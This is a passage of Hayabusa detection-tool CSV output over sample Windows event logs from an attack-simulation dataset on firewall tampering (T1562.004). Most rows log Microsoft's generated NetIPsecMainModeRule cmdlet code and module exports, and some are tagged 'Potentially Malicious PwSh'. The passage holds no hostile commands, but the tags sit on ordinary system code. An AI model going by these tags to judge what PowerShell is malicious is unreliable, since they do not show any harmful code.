($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.867 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.868 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.869 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.870 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.870 